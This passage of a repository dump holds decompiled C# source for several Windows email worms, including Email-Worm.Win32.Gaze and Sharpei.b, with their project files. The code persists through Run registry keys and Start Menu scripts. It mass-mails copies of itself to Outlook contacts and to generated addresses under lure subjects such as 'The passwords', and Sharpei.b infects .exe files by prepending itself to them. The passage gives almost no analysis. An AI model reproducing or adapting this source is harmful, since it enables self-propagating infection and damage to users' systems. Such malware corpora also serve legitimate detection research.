Module1.d[4] = "\"mary";
Module1.d[5] = "\"sonia";
Module1.d[6] = "\"damien";
Module1.d[7] = "\"caoibhe";
Module1.d[8] = "\"kevin";
Module1.d[9] = "\"aishling";
Module1.d[10] = "\"maree";
Module1.d[11] = "\"nicola";
Module1.d[12] = "\"debbie";
Module1.d[13] = "\"susan";
Module1.d[14] = "\"naoimh";
Module1.d[15] = "\"bridget";
Module1.d[16] = "\"declan";
Module1.d[17] = "\"nuala";
Module1.d[18] = "\"micheal";
Module1.d[19] = "\"anthony";
Module1.d[20] = "\"joseph";
Module1.d[21] = "\"james";
Module1.d[22] = "\"keirin";
Module1.d[23] = "\"john";
Module1.d[24] = "\"ronan";
Module1.d[25] = "\"gavin";
Module1.d[26] = "\"david";
Module1.d[27] = "\"peter";
Module1.d[28] = "\"steven";
Module1.d[29] = "\"colin";
Module1.d[30] = "\"katie";
Module1.d[31] = "\"kathy";
Module1.d[32] = "\"noirin";
Module1.d[33] = "\"julia";
Module1.d[34] = "\"julie";
Module1.d[35] = "\"wayne";
Module1.d[36] = "\"sean";
Module1.d[37] = "\"shaun";
Module1.d[38] = "\"shane";
Module1.d[39] = "\"linda";
Module1.d[40] = "\"tanya";
Module1.d[41] = "\"tammy";
Module1.d[42] = "\"abbey";
Module1.d[43] = "\"robyn";
Module1.d[44] = "\"robert";
Module1.d[45] = "\"rachel";
Module1.d[46] = "\"naoimi";
Module1.d[47] = "\"natalie";
Module1.d[48] = "\"lauren";
Module1.d[49] = "\"gerard";
Module1.d[50] = "\"vincent";
Module1.h[0] = "1";
Module1.h[1] = "1995";
Module1.h[2] = "1996";
Module1.h[3] = "1997";
Module1.h[4] = "1998";
Module1.h[5] = "1999";
Module1.h[6] = "2000";
Module1.h[7] = "2003";
Module1.h[8] = "keane";
Module1.h[9] = "obrien";
Module1.h[10] = "kelly";
Module1.h[11] = "oreilly";
Module1.h[12] = "whelan";
Module1.h[13] = "linnane";
Module1.h[14] = "haze";
Module1.h[15] = "oneill";
Module1.h[16] = "mcnamara";
Module1.h[17] = "heinz";
Module1.h[18] = "hally";
Module1.h[19] = "mcmahon";
Module1.h[20] = "lynch";
Module1.h[21] = "carthy";
Module1.h[22] = "osullivan";
Module1.h[23] = "larkin";
Module1.h[24] = "walshe";
Module1.h[25] = "clancy";
Module1.h[26] = "nolan";
Module1.h[27] = "griffin";
Module1.h[28] = "casey";
Module1.h[29] = "oconnell";
Module1.h[30] = "odonnell";
Module1.h[31] = "chambers";
Module1.h[32] = "mulqueen";
Module1.h[33] = "mulcare";
Module1.h[34] = "coyne";
Module1.h[35] = "kerse";
Module1.h[36] = "burke";
Module1.h[37] = "mcinerney";
Module1.h[38] = "talty";
Module1.h[39] = "mcswiggan";
Module1.h[40] = "brown";
Module1.h[41] = "given";
Module1.h[42] = "mcgibney";
Module1.h[43] = "coffey";
Module1.h[44] = "quealy";
Module1.h[45] = "";
Module1.h[46] = "odea";
Module1.h[47] = "oshea";
Module1.h[48] = "ryan";
Module1.h[49] = "troy";
Module1.h[50] = "welsh";
Module1.h[51] = "neylon";
Module1.h[52] = "barrett";
Module1.h[53] = "lavrey";
Module1.h[54] = "ginnane";
Module1.h[55] = "hopkins";
Module1.h[56] = "hoskins";
Module1.h[57] = "carey";
Module1.h[58] = "king";
Module1.h[59] = "thompson";
Module1.h[60] = "bronson";
Module1.h[61] = "grogan";
Module1.h[62] = "meeney";
Module1.h[63] = "monaghan";
Module1.h[64] = "moroney";
Module1.h[65] = "lohan";
Module1.h[66] = "lucas";
Module1.h[67] = "healey";
Module1.h[67] = "";
Module1.h[68] = "crowley";
Module1.e[0] = "@yahoo.co.uk\"";
Module1.e[1] = "@hotmail.com\"";
Module1.e[2] = "@yahoo.co.uk\"";
Module1.e[3] = "@hotmail.com\"";
Module1.e[4] = "@yahoo.co.uk\"";
Module1.e[5] = "@hotmail.com\"";
Module1.x = Module1.d[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * 7.0 + (double) VBMath.Rnd() * 12.0 + (double) VBMath.Rnd() * 11.0 + (double) VBMath.Rnd() * 1.0 + (double) VBMath.Rnd() * 19.0)))];
Module1.y = Module1.e[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 5f)))];
Module1.q = Module1.h[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * 12.0 + (double) VBMath.Rnd() * 16.0 + (double) VBMath.Rnd() * 4.0 + (double) VBMath.Rnd() * 13.0 + (double) VBMath.Rnd() * 13.0 + (double) VBMath.Rnd() * 10.0)))];
Module1.z = Module1.x + Module1.q + Module1.y;
Module1.a[0] = "\"Oh my god\"";
Module1.a[1] = "\"Your document\"";
Module1.a[2] = "\"Heres the file\"";
Module1.a[3] = "\"The passwords\"";
Module1.a[4] = "\"Thanks for this\"";
Module1.a[5] = "\"you have to see it\"";
Module1.a[6] = "\"look at this\"";
Module1.a[7] = "\"this is mad\"";
Module1.a[8] = "\"hi how are you\"";
Module1.a[9] = "\"Whats the Story\"";
Module1.a[10] = "\"Here it is i think\"";
Module1.b[0] = "\"Yeah here it is i found it last nite\"";
Module1.b[1] = "\"Do you want it or not\"";
Module1.b[2] = "\"This is the best i have seen yet\"";
Module1.b[3] = "\"Well i havent got much time but here it is\"";
Module1.b[4] = "\"I didnt have much time to look at it but here take it\"";
Module1.b[5] = "\"I got this from a friend\"";
Module1.b[6] = "\"Do you want this file\"";
Module1.b[7] = "\"I cant believe i had this\"";
Module1.b[8] = "\"Try it and tell me what you think\"";
Module1.b[9] = "\"I think you asked me for this if not just delete it\"";
Module1.b[10] = "\"Heres the file you asked for\"";
Module1.c = Strings.StrReverse(")0(metIetaerC.ppAkooltuO");
Module1.g[0] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
Module1.g[1] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
Module1.g[2] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
StreamWriter streamWriter = new StreamWriter((Stream) new FileStream("c:\\Documents and Settings\\All Users\\Start Menu\\" + Module1.m, FileMode.Create, FileAccess.Write));
streamWriter.WriteLine("On Error Resume Next");
streamWriter.WriteLine("" + Module1.g[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 2f)))]);
streamWriter.WriteLine("If Not OutlookApp = \"\" Then");
streamWriter.WriteLine("Set OutlookEmail = " + Module1.c);
streamWriter.WriteLine("OutlookEmail.Recipients.Add " + Module1.z);
streamWriter.WriteLine("OutlookEmail.Subject = " + Module1.a[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Body = " + Module1.b[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Attachments.Add(\"c:\\fr8i.exe\")");
streamWriter.WriteLine("OutlookEmail.Importance = 1");
streamWriter.WriteLine("OutlookEmail.DeleteAfterSubmit = True");
streamWriter.WriteLine("OutlookEmail.Send");
streamWriter.WriteLine("End If");
streamWriter.Close();
checked { ++Module1.t; }
}
while (Module1.t <= 50);
}
}
public static void full()
{
Module1.t = 1;
do
{
checked { ++Module1.l; }
Module1.m = StringType.FromInteger(Module1.l) + Module1.k;
StreamWriter streamWriter = new StreamWriter((Stream) new FileStream("c:\\Documents and Settings\\All Users\\Start Menu\\" + Module1.m, FileMode.Create, FileAccess.Write));
streamWriter.WriteLine("On Error Resume Next");
streamWriter.WriteLine("" + Module1.g[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 2f)))]);
streamWriter.WriteLine("If Not OutlookApp = \"\" Then");
streamWriter.WriteLine("Set OutlookEmail = " + Module1.c);
streamWriter.WriteLine("OutlookEmail.Recipients.Add " + Module1.z);
streamWriter.WriteLine("OutlookEmail.Subject = " + Module1.a[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Body = " + Module1.b[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Attachments.Add(\"c:\\fr8i.exe\")");
streamWriter.WriteLine("OutlookEmail.Importance = 1");
streamWriter.WriteLine("OutlookEmail.DeleteAfterSubmit = True");
streamWriter.WriteLine("OutlookEmail.Send");
streamWriter.WriteLine("End If");
streamWriter.Close();
checked { ++Module1.t; }
}
while (Module1.t <= 3600);
}
}
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyVersion("1.0.997.22053")]
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Email-Worm.Win32.Gaze.csproj
+45
View File
@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{63D73A47-01DC-4D91-B0DD-B30751C596FE}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>game</AssemblyName>
<ApplicationVersion>1.0.997.22053</ApplicationVersion>
<RootNamespace>game</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Email-Worm.Win32.Gaze.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "game", "Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.csproj", "{63D73A47-01DC-4D91-B0DD-B30751C596FE}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Debug|Any CPU.Build.0 = Debug|Any CPU
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Release|Any CPU.ActiveCfg = Release|Any CPU
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Form1.cs
+83
View File
@@ -0,0 +1,83 @@
// Decompiled with JetBrains decompiler
// Type: game.Form1
// Assembly: game, Version=1.0.997.22053, Culture=neutral, PublicKeyToken=null
// MVID: C1B9288B-F130-4335-97F2-0FD15B3024FA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace game
{
public class Form1 : Form
{
private Container components = (Container) null;
private RegistryKey key = Registry.LocalMachine;
private RegistryKey key1;
public Form1()
{
this.InitializeComponent();
try
{
if (!File.Exists("c:\\WINNT\\system32\\game.exe"))
{
File.Copy(Directory.GetCurrentDirectory() + "\\game.exe", "c:\\WINNT\\system32\\game.exe", true);
this.key1 = this.key.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
this.key1.SetValue("msdosie", (object) "c:\\WINNT\\system32\\game.exe");
this.key1.Close();
}
FileStream fileStream = new FileStream("c:\\WINNT\\system32\\mail.vbs", FileMode.Create, FileAccess.Write, FileShare.Write);
StreamWriter streamWriter = new StreamWriter((Stream) fileStream);
streamWriter.WriteLine("'On Error Resume Next");
streamWriter.WriteLine("Set objOA=Wscript.CreateObject(\"Outlook.Application\")");
streamWriter.WriteLine("Set objMapi=objOA.GetNameSpace(\"MAPI\")");
streamWriter.WriteLine("For i=1 to objMapi.AddressLists.Count");
streamWriter.WriteLine("Set objAddList=objMapi.AddressLists(i)");
streamWriter.WriteLine("For j=1 To objAddList. AddressEntries.Count");
streamWriter.WriteLine("Set objMail=objOA.CreateItem(0)");
streamWriter.WriteLine("objMail.Recipients.Add objAddList.AddressEntries(j)");
streamWriter.WriteLine("objMail.Subject=\"faze\"");
streamWriter.WriteLine("objMail.Body=\"How are you today?\"");
streamWriter.WriteLine("objMail.Attachments.Add \"c:\\WINNT\\system32\\game.exe\"");
streamWriter.WriteLine("objMail.Send");
streamWriter.WriteLine("Next");
streamWriter.WriteLine("Next");
streamWriter.WriteLine("Set objMapi=Nothing");
streamWriter.WriteLine("Set objOA=Nothing");
streamWriter.Flush();
streamWriter.Close();
fileStream.Close();
Process.Start("c:\\WINNT\\system32\\mail.vbs");
}
catch
{
}
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.AutoScaleBaseSize = new Size(6, 14);
this.ClientSize = new Size(292, 273);
this.Name = nameof (Form1);
this.ShowInTaskbar = false;
this.Text = nameof (Form1);
this.WindowState = FormWindowState.Minimized;
}
[STAThread]
private static void Main() => Application.Run((Form) new Form1());
}
}
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Form1.resx
+123
View File
@@ -0,0 +1,123 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>BUZvcm0x</value>
</data>
</root>
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyVersion("1.0.786.1197")]
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Email-Worm.Win32.Sharpei.b.csproj
+43
View File
@@ -0,0 +1,43 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{3AB86921-A569-4B25-8BDA-B5539F274189}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Sharp</AssemblyName>
<ApplicationVersion>1.0.786.1197</ApplicationVersion>
<RootNamespace>Sharp</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="Sharp.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Sharp.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Email-Worm.Win32.Sharpei.b.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharp", "Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.csproj", "{3AB86921-A569-4B25-8BDA-B5539F274189}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3AB86921-A569-4B25-8BDA-B5539F274189}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{3AB86921-A569-4B25-8BDA-B5539F274189}.Debug|Any CPU.Build.0 = Debug|Any CPU
{3AB86921-A569-4B25-8BDA-B5539F274189}.Release|Any CPU.ActiveCfg = Release|Any CPU
{3AB86921-A569-4B25-8BDA-B5539F274189}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Sharp.cs
+86
View File
@@ -0,0 +1,86 @@
// Decompiled with JetBrains decompiler
// Type: Sharp.Sharp
// Assembly: Sharp, Version=1.0.786.1197, Culture=neutral, PublicKeyToken=null
// MVID: C5414447-1586-4206-9133-31D57E99CDF8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
namespace Sharp
{
public class Sharp
{
private static string virname = (string) Registry.LocalMachine.OpenSubKey("Software\\Sharp").GetValue("");
[STAThread]
private static void Main()
{
StreamWriter text = new FileInfo(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).FullName + "\\Sharp.vbs").CreateText();
text.Write("MsgBox \"You're infected with Win32.HLLP.Sharp, written in C#, by Gigabyte/Metaphase\",64,\"title\"");
text.Close();
string fullName = new DirectoryInfo(Environment.SystemDirectory).Parent.FullName;
string[] directories = Directory.GetDirectories(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)).FullName, "*.*");
Sharp.Sharp.FileSearch(fullName);
Sharp.Sharp.FileSearch(directories[11]);
Sharp.Sharp.FileSearch(directories[12]);
Sharp.Sharp.FileSearch(directories[13]);
FileStream fileStream1 = new FileStream(Sharp.Sharp.virname, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 12288))];
fileStream1.Seek(12288L, SeekOrigin.Begin);
fileStream1.Read(buffer, 0, (int) fileStream1.Length - 12288);
fileStream2.Write(buffer, 0, (int) fileStream1.Length - 12288);
long length = fileStream2.Length;
fileStream2.Close();
if (length > 0L && !Sharp.Sharp.virname.EndsWith("MS02-010.exe"))
new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
while (File.Exists("temp.exe"))
{
try
{
File.Delete("temp.exe");
}
catch
{
}
}
}
private static void FileSearch(string DirectoryToCheck)
{
string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
int length = files.Length;
for (int index = 0; index < length; ++index)
{
string str = files[index];
FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
fileStream1.Seek(18L, SeekOrigin.Begin);
int num = fileStream1.ReadByte();
fileStream1.Close();
if (num != 103)
{
try
{
File.SetAttributes(str, FileAttributes.Normal);
File.Copy(str, "hostcopy.exe", true);
File.Copy(Sharp.Sharp.virname, str, true);
FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
FileStream fileStream3 = new FileStream(str, FileMode.Append);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
fileStream2.Read(buffer, 0, (int) fileStream2.Length);
fileStream3.Write(buffer, 0, (int) fileStream2.Length);
fileStream2.Close();
fileStream3.Close();
}
catch
{
}
}
}
File.Delete("hostcopy.exe");
}
}
}
MSIL/Email-Worm/Win32/S/Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84/Sharp.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
